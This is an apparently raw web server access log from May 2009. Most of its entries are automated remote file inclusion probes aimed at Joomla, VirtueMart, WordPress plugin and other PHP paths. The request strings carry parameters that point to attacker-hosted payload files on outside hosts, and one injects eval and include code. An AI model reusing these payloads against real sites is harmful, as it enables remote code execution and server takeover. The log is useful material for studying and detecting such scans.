203.130.231.111 - - [25/May/2009:19:00:00 -0500] "GET ////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
203.130.231.111 - - [25/May/2009:19:00:00 -0500] "GET /logs////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.130.231.111 - - [25/May/2009:19:00:01 -0500] "GET ////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
195.34.78.110 - - [25/May/2009:19:00:34 -0500] "GET /logs////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:19:00:34 -0500] "GET /logs////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:19:00:35 -0500] "GET ////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:19:00:35 -0500] "GET ////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
203.130.231.111 - - [25/May/2009:19:01:17 -0500] "GET /logs////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.130.231.111 - - [25/May/2009:19:01:17 -0500] "GET /logs////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.130.231.111 - - [25/May/2009:19:01:18 -0500] "GET ////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
203.130.231.111 - - [25/May/2009:19:01:18 -0500] "GET ////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
195.34.78.110 - - [25/May/2009:19:02:09 -0500] "GET /logs////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:19:02:09 -0500] "GET ////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:19:02:16 -0500] "GET /logs////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:19:02:17 -0500] "GET ////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:19:05:47 -0500] "GET /logs////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:19:05:48 -0500] "GET ////components/com_joomlalib/standalone/stubjambo.php?baseDir=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
65.55.208.142 - - [25/May/2009:19:06:30 -0500] "GET /logs/access_log.1136678400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [25/May/2009:19:06:30 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
220.181.7.97 - - [25/May/2009:19:09:30 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.106.107 - - [25/May/2009:19:11:48 -0500] "GET /logs/access_log.1180483200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.239.76.25 - - [25/May/2009:19:16:26 -0500] "GET /logs/access_log.1240790400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
222.239.76.25 - - [25/May/2009:19:16:26 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.239.76.25 - - [25/May/2009:19:16:26 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
222.239.76.25 - - [25/May/2009:19:16:26 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
93.104.211.191 - - [25/May/2009:19:17:10 -0500] "GET /logs//safehtml/safehtml.php?dir[plugins]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
93.104.211.191 - - [25/May/2009:19:17:12 -0500] "GET //safehtml/safehtml.php?dir[plugins]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
93.104.211.191 - - [25/May/2009:19:17:12 -0500] "GET /logs/access_log.1237420800//safehtml/safehtml.php?dir[plugins]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
93.174.0.65 - - [25/May/2009:19:26:29 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:19:26:29 -0500] "GET /phphtml.php?htmlclass_path=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:19:26:29 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:19:32:13 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:19:32:13 -0500] "GET /logs/access_log.1240963200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:19:32:13 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:19:32:13 -0500] "GET /logs/access_log.1241481600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:19:33:47 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:19:33:47 -0500] "GET /logs/access_log.1240963200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:19:33:47 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:19:33:47 -0500] "GET /logs/access_log.1241481600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.214 - - [25/May/2009:19:35:49 -0500] "GET /logs/access_log.1178928000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.210.42 - - [25/May/2009:19:36:05 -0500] "GET /logs/access_log.1242432000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:19:36:05 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:19:36:05 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:19:36:10 -0500] "GET /logs/access_log.1239667200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:19:36:45 -0500] "GET /logs/access_log.1240185600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
93.174.0.65 - - [25/May/2009:19:38:19 -0500] "GET /logs/access_log.1242432000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:19:38:19 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:19:38:19 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.93.147.154 - - [25/May/2009:19:39:34 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
200.93.147.154 - - [25/May/2009:19:39:35 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
93.174.0.65 - - [25/May/2009:19:40:03 -0500] "GET /logs/access_log.1239062400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.18.148.82 - - [25/May/2009:19:40:05 -0500] "GET /htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.18.148.82 - - [25/May/2009:19:40:06 -0500] "GET /logs/htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.18.148.82 - - [25/May/2009:19:40:06 -0500] "GET /logs/access_log.1241654400/htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.18.148.82 - - [25/May/2009:19:40:07 -0500] "GET /logs/access_log.1239494400/htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:19:40:09 -0500] "GET /logs/access_log.1240272000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
116.125.126.72 - - [25/May/2009:19:48:36 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
116.125.126.72 - - [25/May/2009:19:48:36 -0500] "GET /logs/access_log.1239321600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
116.125.126.72 - - [25/May/2009:19:48:36 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:19:49:17 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:19:49:17 -0500] "GET //?path%5Bdocroot%5D=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:19:49:17 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:19:49:18 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 200 190846 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:19:49:42 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:19:49:42 -0500] "GET /logs/access_log.1240963200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:19:49:42 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:19:49:51 -0500] "GET /logs/access_log.1240185600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
116.125.126.72 - - [25/May/2009:19:50:50 -0500] "GET /logs/access_log.1240876800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
209.200.8.89 - - [25/May/2009:19:53:09 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://finance-911.com/done/.log/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
209.200.8.89 - - [25/May/2009:19:53:09 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://finance-911.com/done/.log/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
221.157.225.65 - - [25/May/2009:19:54:00 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
221.157.225.65 - - [25/May/2009:19:54:00 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
221.157.225.65 - - [25/May/2009:19:54:00 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
221.157.225.65 - - [25/May/2009:19:54:09 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
206.221.215.41 - - [25/May/2009:19:54:11 -0500] "GET /htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
206.221.215.41 - - [25/May/2009:19:54:11 -0500] "GET /logs/access_log.1241654400/htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
206.221.215.41 - - [25/May/2009:19:54:17 -0500] "GET /logs/htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
206.221.215.41 - - [25/May/2009:19:54:25 -0500] "GET /logs/access_log.1239494400/htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
91.121.210.42 - - [25/May/2009:19:54:43 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:19:54:43 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:19:54:43 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
194.126.110.134 - - [25/May/2009:19:55:45 -0500] "GET /logs/access_log.1241740800/inc/tell_a_friend.inc.php?script_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
194.126.110.134 - - [25/May/2009:19:55:45 -0500] "GET /logs/inc/tell_a_friend.inc.php?script_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
194.126.110.134 - - [25/May/2009:19:55:45 -0500] "GET /inc/tell_a_friend.inc.php?script_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
91.121.210.42 - - [25/May/2009:19:56:10 -0500] "GET /logs/access_log.1240185600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:19:56:10 -0500] "GET /logs/access_log.1241481600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
72.18.148.82 - - [25/May/2009:20:05:55 -0500] "GET /logs/index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.18.148.82 - - [25/May/2009:20:05:55 -0500] "GET /index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.221.215.41 - - [25/May/2009:20:05:57 -0500] "GET /logs/access_log.1241913600/index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.221.215.41 - - [25/May/2009:20:05:57 -0500] "GET /logs/index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.221.215.41 - - [25/May/2009:20:05:57 -0500] "GET /index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.18.148.82 - - [25/May/2009:20:06:13 -0500] "GET /logs/access_log.1241913600/index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:20:07:02 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:20:07:04 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:20:07:06 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:20:07:07 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:20:07:08 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:20:07:08 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:10:06 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:10:06 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:10:06 -0500] "GET /logs/access_log.1240099200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.238 - - [25/May/2009:20:10:48 -0500] "GET /logs/access_log.1119312000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.140.23.192 - - [25/May/2009:20:12:03 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:12:03 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:12:03 -0500] "GET /logs/access_log.1242432000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:12:19 -0500] "GET /logs/access_log.1240099200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:20:13:50 -0500] "GET /logs/access_log.1233619200/?DOCUMENT_ROOT=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:20:13:51 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:20:13:52 -0500] "GET /?DOCUMENT_ROOT=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:20:14:57 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:20:15:48 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
78.40.224.155 - - [25/May/2009:20:16:07 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
221.157.225.65 - - [25/May/2009:20:17:35 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
221.157.225.65 - - [25/May/2009:20:17:35 -0500] "GET /?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
221.157.225.65 - - [25/May/2009:20:17:37 -0500] "GET /logs/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
221.157.225.65 - - [25/May/2009:20:17:45 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
91.121.210.42 - - [25/May/2009:20:19:19 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.121.210.42 - - [25/May/2009:20:19:19 -0500] "GET /logs/access_log.1239062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
91.121.210.42 - - [25/May/2009:20:19:19 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
91.121.210.42 - - [25/May/2009:20:19:24 -0500] "GET /logs/access_log.1240876800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.208.73.49 - - [25/May/2009:20:19:56 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.208.73.49 - - [25/May/2009:20:19:56 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.73.49 - - [25/May/2009:20:19:56 -0500] "GET /logs/access_log.1239062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.208.73.49 - - [25/May/2009:20:19:56 -0500] "GET /logs/access_log.1241654400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
